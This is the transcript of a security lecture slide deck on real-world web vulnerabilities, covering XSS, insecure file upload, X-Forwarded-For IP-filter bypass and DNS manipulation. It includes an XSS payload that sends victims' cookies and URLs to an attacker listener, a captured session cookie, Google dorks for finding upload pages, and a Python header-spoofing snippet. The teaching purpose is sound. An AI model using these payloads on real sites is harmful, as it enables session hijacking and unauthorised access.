idasec copyright - all rights reserved1 web vulnerabilities in the real world
TRANSCRIPT
IDAsec copyright - all rights reserved 1
Web Vulnerabilities in the real world
IDAsec copyright - all rights reserved 2
About me
@Linkedin – Itzik Moshe Security Researcher Co-Founder & CEO of IDAsec Lecturer - See-Security College
IDAsec copyright - all rights reserved 3
Known terms
XSS SQLi CSRF Bla bla bla...
IDAsec copyright - all rights reserved 4
Study Case #1 - XSS
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws
IDAsec copyright - all rights reserved 5
Example
IDAsec copyright - all rights reserved 6
Example
IDAsec copyright - all rights reserved 7
Study Case #1 – XSS
Admin Panel Server Website Server No Connection between Main site & Admin panel Temporary DB / Synchronized DB
IDAsec copyright - all rights reserved 8
Contact Us
IDAsec copyright - all rights reserved 9
Study Case #1 - XSS
<script>var c = document.cookie;var u = document.URL;xmlhttp.open("POST","myserver/listener",true);xmlhttp.send("cookie=” + c + ”&url=" + u);</script>
IDAsec copyright - all rights reserved 10
Server Side
Cookie: "PHPSESSID=56669e7e1e131dc965ad8e9adc7501e0"
Url: Victimaddress.com
IDAsec copyright - all rights reserved 11
Inject the Cookie
IDAsec copyright - all rights reserved 12
Study Case #2 – Insecure Upload Uploaded files represent a significant risk to applications. The first step in many attacks is to get
some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.
The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, and simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
There are really two classes of problems here. The first is with the file metadata, like the path and file name. These are generally provided by the transport, such as HTTP multi-part encoding. This data may trick the application into overwriting a critical file or storing the file in a bad location. You must validate the metadata extremely carefully before using it.
The other class of problem is with the file size or content. The range of problems here depends entirely on what the file is used for. See the examples below for some ideas about how files might be misused. To protect against this type of attack, you should analyze everything your application does with files and think carefully about what processing and interpreters are involved
IDAsec copyright - all rights reserved 13
Study Case #2 – Insecure Upload
Main Local Server + Temporary DB Off-line Server + main DB Website(3rd party)
IDAsec copyright - all rights reserved 14
Some Google dorking...
Site:victim.com intext:upload Site:victim.com inurl:upload Site:victim.com intext:upload https://www.exploit-db.com/google-hacking-database
IDAsec copyright - all rights reserved 15
Phishing
IDAsec copyright - all rights reserved 16
Study Case #2 – Insecure Upload
Reverse connection within 3mins Inside VPN IT Manager Turned off the entire company after
2 hours White night(ops...)
IDAsec copyright - all rights reserved 17
Study Case #3 – Dumb Mistakes
IDAsec copyright - all rights reserved 18
Study Case #3 – Dumb Mistakes
HTTP Header IP Filter X-Forwarded-For
IDAsec copyright - all rights reserved 19
Study Case #3 – Dumb Mistakes
Login.php~ List of authorized IP address
IDAsec copyright - all rights reserved 20
Injecting Header
import urllib2,cookielib
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
opener.addheaders = [('HTTP_X_FORWARDED_FOR','1.2.3.4'),]
resp=opener.open('http://example.com/logIP.php')
IDAsec copyright - all rights reserved 21
Conclusions
CHAEP OUTSOURCING != SECURITY
IDAsec copyright - all rights reserved 22
Case Study #4 – Authentication
IDAsec copyright - all rights reserved 23
Local Network DNS Manipulation
Poison DNS response Attacker runs Local PHP Proxy Steal victim's credentials
IDAsec copyright - all rights reserved 24
Example
IDAsec copyright - all rights reserved 25
Solutions(sort of)
Cookies Management Authentication Layers(Code) JavaScript / Ajax Solutions
IDAsec copyright - all rights reserved 26
Questions?